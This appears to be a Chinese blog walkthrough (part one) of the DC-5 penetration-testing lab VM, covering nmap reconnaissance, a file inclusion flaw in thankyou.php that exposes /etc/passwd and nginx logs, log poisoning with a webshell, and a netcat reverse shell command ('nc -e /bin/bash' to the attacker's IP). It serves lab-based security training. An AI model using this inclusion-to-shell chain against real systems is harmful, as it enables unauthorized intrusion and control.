DC-5渗透测试教程详解(上)

简介: DC-5渗透测试教程详解

DC-5渗透测试教程详解


测试机和靶机准备

有需要自取,注意调整DC-5的与kali在同一个为NAT模式下


[测试机kali]

b2ca9dd019824770bb645f79f5d0c43d.jpg


[靶机DC-5]

e0531f86231b48a3a0097d1d1bc998c2.jpg



信息收集

kali的IP地址为 192.168.10.140

- kali

cb39e35ddf0b4a8084819e7705ea570a.png

- dc-5

d640e2fae0c4429a9c182c1edebf4b5f.png

使用nmap进行扫描

2e0761c6f0e64986ba25b8c861d20d30.png


打开浏览器登录 192.168.10.134进行访问,确定其是否为目标主机

df9597f2d277466e8c659e46a1cf4409.png


漏洞分析

寻找漏洞

e8404ec2963f447faf1dca7655ba90c2.png


在contact界面提交信息后,发现底部的时间显示会变动,

所以猜测可能存在漏洞。底部的年份显示独立存在的数据,

可能存在于某个文件中,传递给了thankyou.php。

验证猜想,使用御剑对其扫描

发现有可以文件 footer.php

9cf6bc402d13476c8fa1514501f7c006.png


对其进行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好】是底部的年份信息


2284bacd60774bff89b8fe3e6e43402f.png


猜想是否行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好是底部的年份

有可能是通过链接传入的!


验证猜想,构造连接

验证想法,构造链接,访问对比,192.168.10.136/thankyou.php?file=footer.php

a9715f0f97cc43f3a2ecc8ac7641ff38.png


192.168.10.139/thankyou.php?file=

41b15791dbee4e5981c1b3e3420c502b.png


如果参数值换成/etc/passwd,那么在底部就会显示DC5的用户信息

d3ac3d3cb2a74a499d4cee7628a48868.png


如果参数值换成nginx日志文件的目录/var/log/nginx/error.log,那么在底部就会显示nginx的日志文件信息。

0b0b27d931a9432ca1d0149712a6ba21.png


渗透测试

文件包含漏洞:通过日志挂马的方式,想办法将一句话木马写入到靶机的日志文件中

62cba8eedd174d0486e34a9686eb644c.png


上传分析

e2789963eb7b4f3bb93f6dc0618a8bb7.png


使用Burp suite抓包,上传


29a535bc394d4d6aa40bb4c86cdcdabe.png

d446c66a3f04468b8779df8c99acd629.png


验证 http://192.168.10.134/thankyou.php?file=/var/log/nginx/error.log ,查看日志是否上传成功

925026f3b9364e1781533151263dbf1c.png

使用蚁剑连接

686e29db4a424bb29d6763f8699c3752.png


测试连接

4d1466c4bc4d4e81a19d52fb8b889aec.png

74aaeb20b2104f1fb1e454a415d19c1d.png

输入命令 ——发现没有权限

c562d2b03d024db6bdce738d53b7ef81.png

建立反向连接

kali建立反向连接

在kali上开启监听,终端输入命令nc –lvvp 1234

蚁剑中执行命令 nc -e /bin/bash 192.168.10.140 1234 。

在蚁剑中执行的命令不要复制,要手动输入。 192.168.10.140是kali的地址。

2e73dbfcd8cc4aa4a6a5e2f4af3dbac6.png

相关文章
|
6月前
|
人工智能 数据可视化 测试技术
Postman 性能测试教程:快速上手 API 压测
本文介绍API上线后因高频调用导致服务器告警,通过Postman与Apifox进行压力测试排查性能瓶颈。对比两款工具在批量请求、断言验证、可视化报告等方面的优劣,探讨API性能优化策略及行业未来发展方向。
Postman 性能测试教程:快速上手 API 压测
|
8月前
|
JSON JavaScript 测试技术
用Postman玩转电商API:一键测试+自动化请求教程
Postman 是电商 API 测试的高效工具,涵盖基础配置、自动化测试、环境管理与请求自动化,助你快速提升开发效率。
|
7月前
|
前端开发 Java jenkins
Jmeter压力测试工具全面教程和使用技巧。
JMeter是一个能够模拟高并发请求以检查应用程序各方面性能的工具,包括但不限于前端页面、后端服务及数据库系统。熟练使用JMeter不仅能够帮助发现性能瓶颈,还能在软件开发早期就预测系统在面对真实用户压力时的表现,确保软件质量和用户体验。在上述介绍的基础上,建议读者结合官方文档和社区最佳实践,持续深入学习和应用。
1479 10
|
6月前
|
监控 测试技术 API
n8n自动化测试教程 (1):环境搭建与初识n8n
n8n是一款开源、可视化的工作流自动化工具,测试工程师可通过拖拽节点快速构建API测试流程,实现测试编排、数据管理、自动化监控与告警等功能,提升测试效率与覆盖率。
|
7月前
|
JSON 安全 测试技术
什么是API接口测试?这可能是全网最全的教程了!
API 是应用程序间的“中间人”,用于实现通信和数据交换。随着微服务架构的普及,API 数量激增,其质量对系统稳定性至关重要。API 测试可验证功能、性能与安全性,帮助开发者在部署前发现并修复问题,提升系统可靠性。测试内容包括请求方法、URL、请求头、请求体、响应状态码与响应数据等。常用工具如 Postman、AREX 可辅助测试,确保 API 在不同场景下的正确性与稳定性。
|
自然语言处理 机器人 Python
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
ChatPaper是一个基于文本生成技术的智能研究论文工具,能够根据用户输入进行智能回复和互动。它支持快速下载、阅读论文,并通过分析论文的关键信息帮助用户判断是否需要深入了解。用户可以通过命令行或网页界面操作,进行论文搜索、下载、总结等。
439 1
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
495 1
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
229 4
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
314 4
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【10月更文挑战第1天】告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
434 4